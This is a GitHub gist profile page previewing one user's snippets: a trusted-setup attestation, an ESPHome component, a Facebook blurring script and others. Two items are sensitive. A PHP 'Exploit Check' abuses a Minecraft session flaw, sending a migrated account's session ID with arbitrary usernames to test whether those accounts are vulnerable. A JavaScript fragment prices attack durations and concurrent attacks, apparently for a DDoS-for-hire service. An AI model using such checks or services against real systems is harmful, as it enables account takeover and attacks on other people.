Skip to content

Instantly share code, notes, and snippets.

View ajvpot's full-sized avatar
🤔
"Uh, Mr. The Plague, somethin' weird is happening on the net."

Alex Vanderpot ajvpot

🤔
"Uh, Mr. The Plague, somethin' weird is happening on the net."
View GitHub Profile
@ajvpot
ajvpot / zkp2p-trusted-setup-ceremony-v2-4_attestation.log
Created February 6, 2024 21:02
Attestation for ZKP2P Trusted Setup Ceremony V2.4 MPC Phase 2 Trusted Setup ceremony
Hey, I'm ajvpot-553597 and I have contributed to the ZKP2P Trusted Setup Ceremony V2.4.
The following are my contribution signatures:
Circuit # 1 (zkp2p-venmo-send-v2)
Contributor # 12
Contribution Hash: 06c0719b a0a75c24 4b5376c4 eb711a38
6cdadd93 8b2de269 4321121a 5a3acbb7
d49fa6f8 67408657 0f66bf1a 67a70be4
e0867bf4 be19eadc 846a9f9a 1fbaab52
@ajvpot
ajvpot / gist:3115176
Created July 15, 2012 05:35
Minecraft Migrated Account Session Vulnerability
                  ████▓               
               ▓█▓▓▓▓▓██▒              
             ▒██▒▒▒▒▒▒▒▓█▓             
            ▓█▓▒▒▒▒▒▒▒▒▒▒██            
           ██▒▒▒▒▓███▓▒▒▒▒▓█▒          
         ▒█▓▒▓▓▓██▓░▓█▓▓▓▓▓▓█▓         
        ▓█▓▓▓▓▓██▓   ▒██▓▓▓▓▓██▒       
      ▒██▓▓▓▓███       ███▓▓▓▓██▓      
     ▓██▓█████▒         ▒█████████     

▒█████████ ▒▓▓▓▓▓▓▓▓▒▓█████████▒

[
{
"_BPM": 129.6684000810428,
"_time": 2.0677499999999998,
"_beatsPerBar": 4,
"_metronomeOffset": 4
},
{
"_BPM": 129.14798206278027,
"_time": 2.9969166666666665,
@ajvpot
ajvpot / climate_mitsubishi.h
Last active March 8, 2020 23:32
SwiCago/HeatPump ESPHome Component
#include "esphome.h"
#include "HeatPump.h"
class MitsubishiClimate : public PollingComponent, public Climate
{
public:
HeatPump hp;
MitsubishiClimate() : PollingComponent(10000)
{
<script type="text/rocketscript">
$(function() {
$('#lr').css('opacity', '0.4');
var price = 9.00;
var paymenttype = 'paypal';
var one_month = 9.00;
var lifetime = 3;
var sixty_seconds = 1.00;
var concurrent_attack = 20.00;
@ajvpot
ajvpot / full.js
Created November 4, 2012 17:27
Facebook Blurrer
function getElementsByClassName(className){
var hasClassName = new RegExp("(?:^|\\s)" + className + "(?:$|\\s)");
var allElements = document.getElementsByTagName("*");
var results = [];
var element;
for (var i = 0; (element = allElements[i]) != null; i++) {
var elementClass = element.className;
if (elementClass && elementClass.indexOf(className) != -1 && hasClassName.test(elementClass))
results.push(element);
}
@ajvpot
ajvpot / gist:3115445
Created July 15, 2012 06:30
Exploit Check
<?php
$sessid = "herpderp"; //insert a session id from a migrated account here.
if(isset($_POST["name"]) && !empty($_POST["name"])){
$name=$_POST["name"];
$url="http://session.minecraft.net/game/joinserver.jsp?user=$name&sessionId=$sessid&serverId=a";
$res=file_get_contents($url);
if($res == "OK") die("<b><font color=green>The account ".htmlspecialchars($name)." is vulnerable.</font></b>");
if($res == "Bad login") die("<font color=red>The account ".htmlspecialchars($name)." is NOT vulnerable or is not migrated.</font>");
echo "Could not determine status of account ($res)";
}else{